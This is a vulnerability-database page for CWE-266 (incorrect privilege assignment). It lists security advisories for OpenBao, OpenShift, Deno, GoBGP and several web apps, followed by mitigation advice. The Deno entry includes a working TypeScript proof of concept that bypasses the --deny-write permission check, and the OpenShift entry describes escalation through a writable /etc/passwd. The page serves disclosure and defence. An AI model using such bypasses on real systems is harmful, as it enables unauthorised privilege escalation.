CWE-266
AllowedIncorrect Privilege Assignment
Abstraction: Base · Status: Draft
A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.
1913 vulnerabilities reference this CWE, most recent first.
GHSA-VF84-MXRQ-CRQC
Vulnerability from github – Published: 2025-08-08 14:32 – Updated: 2025-08-11 13:56Impact
Accounts with access to the highly-privileged identity entity system in the root namespace may increase their scope directly to the root policy. While the identity system always allowed adding arbitrary policies, which in turn could contain capability grants on arbitrary paths, the root policy is restricted to manual generation using unseal or recovery key shares. The global root policy is not accessible from child namespaces.
Patches
OpenBao v2.3.2 will patch this issue.
Workarounds
Use of denied_parameters in any policy which has access to the affected identity endpoints (on identity entities) may be sufficient to prohibit this type of attack.
References
This issue was disclosed to HashiCorp and is the OpenBao equivalent of the following tickets:
- https://discuss.hashicorp.com/t/hcsec-2025-13-vault-root-namespace-operator-may-elevate-token-privileges/76032
- https://nvd.nist.gov/vuln/detail/cve-2025-5999
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/openbao/openbao"
},
"ranges": [
{
"events": [
{
"introduced": "0.1.0"
},
{
"fixed": "2.3.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/openbao/openbao"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20250806193240-9b0b5d4f345f"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-54996"
],
"database_specific": {
"cwe_ids": [
"CWE-266",
"CWE-269"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-08T14:32:42Z",
"nvd_published_at": "2025-08-09T02:15:37Z",
"severity": "HIGH"
},
"details": "### Impact\n\nAccounts with access to the highly-privileged identity entity system in the root namespace may increase their scope directly to the `root` policy. While the identity system always allowed adding arbitrary policies, which in turn could contain capability grants on arbitrary paths, the `root` policy is restricted to manual generation using unseal or recovery key shares. The global `root` policy is not accessible from child namespaces.\n\n### Patches\n\nOpenBao v2.3.2 will patch this issue.\n\n### Workarounds\n\nUse of `denied_parameters` in any policy which has access to the affected identity endpoints (on [identity entities](https://openbao.org/api-docs/secret/identity/entity/)) may be sufficient to prohibit this type of attack. \n\n### References\n\nThis issue was disclosed to HashiCorp and is the OpenBao equivalent of the following tickets:\n\n- https://discuss.hashicorp.com/t/hcsec-2025-13-vault-root-namespace-operator-may-elevate-token-privileges/76032\n- https://nvd.nist.gov/vuln/detail/cve-2025-5999",
"id": "GHSA-vf84-mxrq-crqc",
"modified": "2025-08-11T13:56:25Z",
"published": "2025-08-08T14:32:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openbao/openbao/security/advisories/GHSA-vf84-mxrq-crqc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54996"
},
{
"type": "WEB",
"url": "https://github.com/openbao/openbao/pull/1627"
},
{
"type": "WEB",
"url": "https://github.com/openbao/openbao/commit/9b0b5d4f345fdfb1065956f042b12cbd86cd6e0f"
},
{
"type": "WEB",
"url": "https://discuss.hashicorp.com/t/hcsec-2025-13-vault-root-namespace-operator-may-elevate-token-privileges/76032"
},
{
"type": "PACKAGE",
"url": "https://github.com/openbao/openbao"
},
{
"type": "WEB",
"url": "https://github.com/openbao/openbao/releases/tag/v2.3.2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/cve-2025-5999"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "OpenBao Root Namespace Operator May Elevate Token Privileges"
}
GHSA-VFJR-R7C6-MQ2H
Vulnerability from github – Published: 2022-05-24 17:08 – Updated: 2023-02-02 21:33It has been found in openshift-enterprise version 3.11 and all openshift-enterprise versions from 4.1 to, including 4.3, that multiple containers modify the permissions of /etc/passwd to make them modifiable by users other than root. An attacker with access to the running container can exploit this to modify /etc/passwd to add a user and escalate their privileges. This CVE is specific to the openshift/mysql-apb.
{
"affected": [],
"aliases": [
"CVE-2020-1708"
],
"database_specific": {
"cwe_ids": [
"CWE-266",
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-02-07T21:15:00Z",
"severity": "MODERATE"
},
"details": "It has been found in openshift-enterprise version 3.11 and all openshift-enterprise versions from 4.1 to, including 4.3, that multiple containers modify the permissions of /etc/passwd to make them modifiable by users other than root. An attacker with access to the running container can exploit this to modify /etc/passwd to add a user and escalate their privileges. This CVE is specific to the openshift/mysql-apb.",
"id": "GHSA-vfjr-r7c6-mq2h",
"modified": "2023-02-02T21:33:40Z",
"published": "2022-05-24T17:08:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1708"
},
{
"type": "WEB",
"url": "https://access.redhat.com/articles/4859371"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0617"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0681"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0694"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0800"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2020-1708"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793299"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1708"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VG2R-RMGP-CGQJ
Vulnerability from github – Published: 2025-10-07 22:36 – Updated: 2025-10-13 15:17Summary
Deno.FsFile.prototype.utime and Deno.FsFile.prototype.utimeSync are not limited by the permission model check --deny-write=./.
It's possible to change to change the access (atime) and modification (mtime) times on the file stream resource even when the file is opened with read only permission (and write: false) and file write operations are not allowed (the script is executed with --deny-write=./).
Similar APIs like Deno.utime and Deno.utimeSync require allow-write permission, however, when a file is opened, even with read only flags and deny-write permission, it's still possible to change the access (atime) and modification (mtime) times, and thus bypass the permission model.
PoC
Setup:
deno --version
deno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)
v8 13.7.152.14-rusty
typescript 5.8.3
touch test.txt
// touch test.txt
// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utime
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1
async function poc1(){
using file = await Deno.open("./test.txt", { read: true, write: false});
const fileInfoBefore = await file.stat();
await file.utime(new Date("2000-01-01"), new Date("2000-01-01"));
const fileInfoAfter = await file.stat();
console.log(`BEFORE (utime)`)
console.log(new Date(fileInfoBefore.mtime).getFullYear())
console.log(new Date(fileInfoBefore.atime).getFullYear())
console.log(`AFTER (utime)`)
console.log(new Date(fileInfoAfter.mtime).getFullYear())
console.log(new Date(fileInfoAfter.atime).getFullYear())
}
// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utimeSync
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2
function poc2(){
using file = Deno.openSync("./test.txt", { read: true, write: false});
const fileInfoBefore = file.statSync();
file.utimeSync(new Date("2001-01-01"), new Date("2001-01-01"));
const fileInfoAfter = file.statSync();
console.log(`BEFORE (utimeSync)`)
console.log(new Date(fileInfoBefore.mtime).getFullYear())
console.log(new Date(fileInfoBefore.atime).getFullYear())
console.log(`AFTER (utimeSync)`)
console.log(new Date(fileInfoAfter.mtime).getFullYear())
console.log(new Date(fileInfoAfter.atime).getFullYear())
}
// https://docs.deno.com/api/deno/~/Deno.utime
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3
async function poc3(){
// not executed
await Deno.utime("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
}
// https://docs.deno.com/api/deno/~/Deno.utimeSync
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4
function poc4(){
// not executed
Deno.utimeSync("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
}
async function main(){
const poc = Deno.args[0] || 1;
const status = await Deno.permissions.query({ name: "write", path: "./" });
console.log(status);
switch (poc) {
case "1":
poc1()
break;
case "2":
poc2()
break;
case "3":
poc3()
break;
case "4":
poc4()
break;
default:
poc1()
}
}
main()
Output:
- deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1
PermissionStatus { state: "denied", onchange: null }
BEFORE (utime)
2025
2025
AFTER (utime)
2000
2000
deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2
PermissionStatus { state: "denied", onchange: null }
BEFORE (utimeSync)
2000
2000
AFTER (utimeSync)
2001
2001
deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires write access to "./test.txt", run again with the --allow-write flag
await Deno.utime("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
^
...
deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires write access to "./test.txt", run again with the --allow-write flag
Deno.utimeSync("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
^
...
Impact
Permission model bypass
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "deno"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-61785"
],
"database_specific": {
"cwe_ids": [
"CWE-266"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-07T22:36:36Z",
"nvd_published_at": "2025-10-08T01:15:32Z",
"severity": "LOW"
},
"details": "### Summary\n\n`Deno.FsFile.prototype.utime` and `Deno.FsFile.prototype.utimeSync` are not limited by the permission model check `--deny-write=./`.\n\nIt\u0027s possible to change to change the access (`atime`) and modification (`mtime`) times on the file stream resource even when the file is opened with `read` only permission (and `write`: `false`) and file write operations are not allowed (the script is executed with `--deny-write=./`).\n\nSimilar APIs like `Deno.utime` and `Deno.utimeSync` require\u00a0`allow-write`\u00a0permission, however, when a file is opened, even with read only flags and deny-write permission, it\u0027s still possible to change the access (`atime`) and modification (`mtime`) times, and thus bypass the permission model.\n\n### PoC\n\nSetup:\n```\ndeno --version\ndeno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n\ntouch test.txt\n```\n\n```js\n// touch test.txt\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utime\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1\nasync function poc1(){\n using file = await Deno.open(\"./test.txt\", { read: true, write: false});\n\n const fileInfoBefore = await file.stat();\n \n await file.utime(new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n \n const fileInfoAfter = await file.stat();\n \n \n console.log(`BEFORE (utime)`)\n console.log(new Date(fileInfoBefore.mtime).getFullYear())\n console.log(new Date(fileInfoBefore.atime).getFullYear())\n \n \n console.log(`AFTER (utime)`)\n console.log(new Date(fileInfoAfter.mtime).getFullYear())\n console.log(new Date(fileInfoAfter.atime).getFullYear())\n}\n\n\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utimeSync\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2\nfunction poc2(){\n using file = Deno.openSync(\"./test.txt\", { read: true, write: false});\n\n const fileInfoBefore = file.statSync();\n \n file.utimeSync(new Date(\"2001-01-01\"), new Date(\"2001-01-01\"));\n \n const fileInfoAfter = file.statSync();\n \n \n console.log(`BEFORE (utimeSync)`)\n console.log(new Date(fileInfoBefore.mtime).getFullYear())\n console.log(new Date(fileInfoBefore.atime).getFullYear())\n \n \n console.log(`AFTER (utimeSync)`)\n console.log(new Date(fileInfoAfter.mtime).getFullYear())\n console.log(new Date(fileInfoAfter.atime).getFullYear())\n}\n\n// https://docs.deno.com/api/deno/~/Deno.utime\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3\nasync function poc3(){\n // not executed\n await Deno.utime(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n}\n\n// https://docs.deno.com/api/deno/~/Deno.utimeSync\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4\nfunction poc4(){\n // not executed\n Deno.utimeSync(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n}\n\n\nasync function main(){\n const poc = Deno.args[0] || 1;\n\n const status = await Deno.permissions.query({ name: \"write\", path: \"./\" });\n console.log(status);\n switch (poc) {\n case \"1\":\n poc1()\n break;\n case \"2\":\n poc2()\n break;\n case \"3\":\n poc3()\n break;\n case \"4\":\n poc4()\n break;\n default:\n poc1()\n }\n}\n\nmain()\n```\n\nOutput:\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nBEFORE (utime)\n2025\n2025\nAFTER (utime)\n2000\n2000\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nBEFORE (utimeSync)\n2000\n2000\nAFTER (utimeSync)\n2001\n2001\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires write access to \"./test.txt\", run again with the --allow-write flag\n await Deno.utime(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n ^\n ...\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires write access to \"./test.txt\", run again with the --allow-write flag\n Deno.utimeSync(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n ^\n ...\n```\n\n\n### Impact\n\nPermission model bypass",
"id": "GHSA-vg2r-rmgp-cgqj",
"modified": "2025-10-13T15:17:42Z",
"published": "2025-10-07T22:36:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/denoland/deno/security/advisories/GHSA-vg2r-rmgp-cgqj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61785"
},
{
"type": "WEB",
"url": "https://github.com/denoland/deno/pull/30872"
},
{
"type": "WEB",
"url": "https://github.com/denoland/deno/commit/992e998dfe436cdc9325232759af8be92f11739b"
},
{
"type": "PACKAGE",
"url": "https://github.com/denoland/deno"
},
{
"type": "WEB",
"url": "https://github.com/denoland/deno/releases/tag/v2.2.15"
},
{
"type": "WEB",
"url": "https://github.com/denoland/deno/releases/tag/v2.5.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Deno\u0027s --deny-write check does not prevent permission bypass"
}
GHSA-VGJ5-9P6R-986X
Vulnerability from github – Published: 2026-02-07 18:30 – Updated: 2026-02-07 18:30A flaw has been found in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. The affected element is the function addDept/updateDept/deleteDept of the file dataset\repos\warehouse\src\main\java\com\yeqifu\sys\controller\DeptController.java of the component Department Management. Executing a manipulation can lead to improper authorization. It is possible to launch the attack remotely. The exploit has been published and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.
{
"affected": [],
"aliases": [
"CVE-2026-2105"
],
"database_specific": {
"cwe_ids": [
"CWE-266"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-07T17:15:47Z",
"severity": "MODERATE"
},
"details": "A flaw has been found in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. The affected element is the function addDept/updateDept/deleteDept of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\sys\\controller\\DeptController.java of the component Department Management. Executing a manipulation can lead to improper authorization. It is possible to launch the attack remotely. The exploit has been published and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.",
"id": "GHSA-vgj5-9p6r-986x",
"modified": "2026-02-07T18:30:27Z",
"published": "2026-02-07T18:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2105"
},
{
"type": "WEB",
"url": "https://github.com/yeqifu/warehouse/issues/57"
},
{
"type": "WEB",
"url": "https://github.com/yeqifu/warehouse/issues/57#issue-3846662068"
},
{
"type": "WEB",
"url": "https://github.com/yeqifu/warehouse"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.344681"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.344681"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.745515"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-VHVM-4XHH-VCGP
Vulnerability from github – Published: 2025-09-18 18:30 – Updated: 2025-09-18 18:30A security flaw has been discovered in fuyang_lipengjun platform 1.0. This impacts the function AttributeController of the file /attribute/queryAll. Performing manipulation results in improper authorization. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited.
{
"affected": [],
"aliases": [
"CVE-2025-10675"
],
"database_specific": {
"cwe_ids": [
"CWE-266"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-18T16:15:49Z",
"severity": "MODERATE"
},
"details": "A security flaw has been discovered in fuyang_lipengjun platform 1.0. This impacts the function AttributeController of the file /attribute/queryAll. Performing manipulation results in improper authorization. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited.",
"id": "GHSA-vhvm-4xhh-vcgp",
"modified": "2025-09-18T18:30:28Z",
"published": "2025-09-18T18:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10675"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.324796"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.324796"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.653343"
},
{
"type": "WEB",
"url": "https://www.cnblogs.com/aibot/p/19063430"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-VHVR-M6MX-8G3V
Vulnerability from github – Published: 2024-10-29 09:30 – Updated: 2026-04-01 18:32: Incorrect Privilege Assignment vulnerability in Udit Rawat Exam Matrix allows Privilege Escalation.This issue affects Exam Matrix: from n/a through 1.5.
{
"affected": [],
"aliases": [
"CVE-2024-50485"
],
"database_specific": {
"cwe_ids": [
"CWE-266"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-29T09:15:12Z",
"severity": "CRITICAL"
},
"details": ": Incorrect Privilege Assignment vulnerability in Udit Rawat Exam Matrix allows Privilege Escalation.This issue affects Exam Matrix: from n/a through 1.5.",
"id": "GHSA-vhvr-m6mx-8g3v",
"modified": "2026-04-01T18:32:12Z",
"published": "2024-10-29T09:30:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50485"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/exam-matrix/vulnerability/wordpress-exam-matrix-plugin-1-5-privilege-escalation-vulnerability?_s_id=cve"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/exam-matrix/wordpress-exam-matrix-plugin-1-5-privilege-escalation-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VJ36-GX8H-Q66M
Vulnerability from github – Published: 2026-03-25 18:31 – Updated: 2026-03-26 15:30Incorrect Privilege Assignment vulnerability in WPFunnels Creator LMS creatorlms allows Privilege Escalation.This issue affects Creator LMS: from n/a through <= 1.1.18.
{
"affected": [],
"aliases": [
"CVE-2026-32530"
],
"database_specific": {
"cwe_ids": [
"CWE-266"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-25T17:17:06Z",
"severity": "HIGH"
},
"details": "Incorrect Privilege Assignment vulnerability in WPFunnels Creator LMS creatorlms allows Privilege Escalation.This issue affects Creator LMS: from n/a through \u003c= 1.1.18.",
"id": "GHSA-vj36-gx8h-q66m",
"modified": "2026-03-26T15:30:34Z",
"published": "2026-03-25T18:31:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32530"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/creatorlms/vulnerability/wordpress-creator-lms-plugin-1-1-18-privilege-escalation-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VJ73-H4QP-97X2
Vulnerability from github – Published: 2026-03-30 15:32 – Updated: 2026-03-30 15:32A security flaw has been discovered in osrg GoBGP up to 4.3.0. This affects the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component BGP OPEN Message Handler. Performing a manipulation of the argument domainNameLen results in improper access controls. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The patch is named 2b09db390a3d455808363c53e409afe6b1b86d2d. It is suggested to install a patch to address this issue.
{
"affected": [],
"aliases": [
"CVE-2026-5122"
],
"database_specific": {
"cwe_ids": [
"CWE-266"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-30T15:16:35Z",
"severity": "MODERATE"
},
"details": "A security flaw has been discovered in osrg GoBGP up to 4.3.0. This affects the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component BGP OPEN Message Handler. Performing a manipulation of the argument domainNameLen results in improper access controls. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The patch is named 2b09db390a3d455808363c53e409afe6b1b86d2d. It is suggested to install a patch to address this issue.",
"id": "GHSA-vj73-h4qp-97x2",
"modified": "2026-03-30T15:32:07Z",
"published": "2026-03-30T15:32:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5122"
},
{
"type": "WEB",
"url": "https://github.com/osrg/gobgp/pull/3343"
},
{
"type": "WEB",
"url": "https://github.com/osrg/gobgp/commit/2b09db390a3d455808363c53e409afe6b1b86d2d"
},
{
"type": "WEB",
"url": "https://github.com/osrg/gobgp"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/780124"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/354154"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/354154/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-VJGX-4H24-68WP
Vulnerability from github – Published: 2024-07-24 21:31 – Updated: 2024-08-27 21:31Insecure permissions in hwameistor v0.14.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token.
{
"affected": [],
"aliases": [
"CVE-2024-36534"
],
"database_specific": {
"cwe_ids": [
"CWE-266"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-24T20:15:03Z",
"severity": "HIGH"
},
"details": "Insecure permissions in hwameistor v0.14.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account\u0027s token.",
"id": "GHSA-vjgx-4h24-68wp",
"modified": "2024-08-27T21:31:13Z",
"published": "2024-07-24T21:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36534"
},
{
"type": "WEB",
"url": "https://gist.github.com/HouqiyuA/0de688e6b874e480ddc1154350368450"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VJM2-83QQ-QQMG
Vulnerability from github – Published: 2026-06-08 18:31 – Updated: 2026-06-08 18:31A weakness has been identified in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected is an unknown function of the file /add.php of the component Student Record Handler. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.
{
"affected": [],
"aliases": [
"CVE-2026-11532"
],
"database_specific": {
"cwe_ids": [
"CWE-266"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-08T17:16:40Z",
"severity": "LOW"
},
"details": "A weakness has been identified in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected is an unknown function of the file /add.php of the component Student Record Handler. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.",
"id": "GHSA-vjm2-83qq-qqmg",
"modified": "2026-06-08T18:31:50Z",
"published": "2026-06-08T18:31:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11532"
},
{
"type": "WEB",
"url": "https://github.com/imvks786/student_management_system/issues/3"
},
{
"type": "WEB",
"url": "https://github.com/imvks786/student_management_system"
},
{
"type": "WEB",
"url": "https://vuldb.com/cve/CVE-2026-11532"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/836634"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/369149"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/369149/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation MIT-1
Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
Mitigation MIT-17
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
No CAPEC attack patterns related to this CWE.